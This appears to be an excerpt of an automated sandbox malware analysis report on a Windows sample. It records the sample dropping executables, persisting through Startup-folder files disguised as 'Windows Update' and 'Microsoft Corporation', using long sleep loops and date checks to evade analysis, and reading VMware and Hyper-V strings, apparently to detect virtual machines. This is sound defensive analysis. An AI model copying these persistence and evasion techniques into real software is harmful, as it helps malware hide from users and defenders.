Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Window / User API: threadDelayed 391 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 409 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 3714 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 3709 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: threadDelayed 592 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: foregroundWindowGot 414 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Window / User API: foregroundWindowGot 422 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to dropped file
Found evasive API chain (date check)
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 6448 Thread sleep count: 391 > 30 Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe TID: 1280 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep count: 409 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244 Thread sleep count: 3714 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 2244 Thread sleep time: -3714000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep count: 3709 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep time: -3709000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796 Thread sleep count: 307 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3796 Thread sleep time: -30700s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep count: 34 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3224 Thread sleep time: -34000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep count: 592 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe TID: 3300 Thread sleep time: -592000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe TID: 4888 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe TID: 1916 Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Uses the system / local time for branch decision (may execute only at specific dates)
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE1718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00AE1754h 1_2_00AE1718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A31718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00A31754h 15_2_00A31718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_00511718 GetSystemTimeAsFileTime followed by cmp: cmp dword ptr [ebp+08h], 02h and CTI: jne 00511754h 22_2_00511718
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE29E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00AE29E2
Source: C:\Users\user\AppData\Local\Temp\server.exe Code function: 4_2_009E9998 FindFirstFileW, 4_2_009E9998
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Code function: 14_2_009F9998 FindFirstFileW, 14_2_009F9998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 15_2_00A329E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 15_2_00A329E2
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Code function: 21_2_00979998 FindFirstFileW, 21_2_00979998
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 22_2_005129E2 wsprintfA,Sleep,memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 22_2_005129E2
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Code function: 1_2_00AE2B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00AE2B8C
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2012 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: #Windows 10 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 2016 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V (core)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\*
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: (Windows 2012 R2 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 2012 R2 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.sys
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 0Windows 8 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 6Windows 8.1 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.1.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.1.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2192046352.0000000001556000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}x~T
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: "Windows 8 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual USB Mouse
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Hyper-V (guest)
Source: Amcache.hve.1.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: RRqyIX.exe, 0000000F.00000003.2526814497.0000000000B5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: dRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Microsoft Hyper-V Server
Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\y
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.1.dr Binary or memory string: \driver\vmci,\driver\pci
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ~VirtualMachineTypes
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ]DLL_Loader_VirtualMachine
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.0000000000778000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Amcache.hve.1.dr Binary or memory string: VMware
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: RRqyIX.exe, 00000001.00000003.2166657985.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000002.2244767719.00000000006BD000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000B14000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000B14000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: RRqyIX.exe, 00000001.00000002.2244767719.0000000000683000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000683000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWp&f%SystemRoot%\system32\mswsock.dllj
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.1.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.1.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.1.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.1.dr Binary or memory string: VMware VMCI Bus Device
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: vmci.syshbin
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}*
Source: Amcache.hve.1.dr Binary or memory string: VMware, Inc.
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.1.dr Binary or memory string: VMware20,1hbin@
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
